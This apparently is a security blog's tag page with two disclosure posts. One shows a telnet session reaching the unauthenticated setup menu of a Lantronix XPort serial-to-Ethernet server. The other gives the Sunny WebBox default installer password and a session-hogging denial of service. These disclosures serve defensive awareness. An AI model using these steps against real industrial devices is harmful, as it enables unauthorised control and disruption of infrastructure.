Posts Tagged ‘Denial of Service’

Lantronix xDirect Serial-to-Ethernet Server / XPort Unauthenticated Access

May 4, 2015

The Lantronix xDirect Serial-to-Ethernet device server allows unauthenticated access to TCP port 9999 which lets an attacker configure the device, gain information about and disable services resulting in a denial of service. For the device tested it was running XPort 6.6.0.2.

df:/tmp/ # telnet 192.168.1.10
Trying 192.168.1.10…
Connected to 192.168.1.10.
Escape character is ‘^]’.

MAC address 00204AC975EE
Software version V6.6.0.2 (080926) XPTEXE

Press Enter for Setup Mode

*** basic parameters
Hardware: Ethernet TPI
IP addr 192.168.1.10, gateway 192.168.1.1,netmask 255.255.255.0
DNS Server not set

*** Security
SNMP is enabled
SNMP Community Name: public
Telnet Setup is enabled
TFTP Download is enabled
Port 77FEh is enabled
Web Server is enabled
Web Setup is enabled
ECHO is disabled
Enhanced Password is disabled
Port 77F0h is enabled

*** Channel 1
Baudrate 38400, I/F Mode 4C, Flow 00
Port 10001
Connect Mode : C0
Send ‘+++’ in Modem Mode enabled
Show IP addr after ‘RING’ enabled
Auto increment source port disabled
Remote IP Adr: — none —, Port 00000
Disconn Mode : 00
Flush Mode : 00

*** Expert
TCP Keepalive : 45s
ARP cache timeout: 600s
CPU performance: Regular
Monitor Mode @ bootup : enabled
RS485 tx enable : active low
HTTP Port Number : 80
SMTP Port Number : 25
MTU Size: 1400
Alternate MAC: disabled
Ethernet connection type: auto-negotiate

*** E-mail
Mail server: 0.0.0.0
Unit :
Domain :
Recipient 1:
Recipient 2:

– Trigger 1
Serial trigger input: disabled
Channel: 1
Match: 00,00
Trigger input1: X
Trigger input2: X
Trigger input3: X
Message :
Priority: L
Min. notification interval: 1 s
Re-notification interval : 0 s

– Trigger 2
Serial trigger input: disabled
Channel: 1
Match: 00,00
Trigger input1: X
Trigger input2: X
Trigger input3: X
Message :
Priority: L
Min. notification interval: 1 s
Re-notification interval : 0 s

– Trigger 3
Serial trigger input: disabled
Channel: 1
Match: 00,00
Trigger input1: X
Trigger input2: X
Trigger input3: X
Message :
Priority: L
Min. notification interval: 1 s
Re-notification interval : 0 s

Change Setup:
0 Server
1 Channel 1
3 E-mail
5 Expert
6 Security
7 Defaults
8 Exit without save
9 Save and exit Your choice ? 6

Disable SNMP (N) ?

SNMP Community Name (public):

Disable Telnet Setup (N) ?

Disable TFTP Firmware Update (N) ?

Disable Port 77FEh (N) ?

Disable Web Server (N) ?

Disable Web Setup (N) ?

Disable ECHO ports (Y) ?

Enable Enhanced Password (N) ?

Disable Port 77F0h (N) ?

Change Setup:
0 Server
1 Channel 1
3 E-mail
5 Expert
6 Security
7 Defaults
8 Exit without save
9 Save and exit Your choice ? 8

exiting without save !
Connection closed by foreign host.
df:/tmp/ #

Sunny WebBox Default Password and Denial of Service

May 2, 2015

sunnywebbox

Sunny WebBox (Shodan search) is an ICS device for data logging. According to the vendor page:

The Sunny WebBox is the ideal monitoring solution for medium-sized PV plants. It receives and stores current measured values and transmits data via RS485. This means you can stay updated on the status of your plant around the clock. In the event of a problem, you can react quickly and secure your yields. Parameters can be changed and a variety of measured values can be depicted, analyzed and downloaded via a web browser. All data from the connected devices is stored and automatically transmitted to Sunny Portal, if desired. The Sunny WebBox allows central access to your plant data on the Internet via Sunny Portal.

The user manual shows that it has a default password and a denial of service condition:

Logging in to the Sunny WebBox
Log in as “Installer”. The default password for the installer is: “sma”.

Many deployed devices just require a password not a username.

6.5 Logging in to the Sunny WebBox for the First Time
The Sunny WebBox distinguishes between 2 user groups: user and installer.
The two user groups are distinguished by two different passwords. If the password is the same for both user groups, you will be logged in as the installer.
In order to prevent two users making changes at the same time, only one user can ever be logged on to the Sunny WebBox at a time.

For a device deployed with Internet access this means that you can authenticate to the system and just keep your session active. That will keep any other user from logging on to use the device.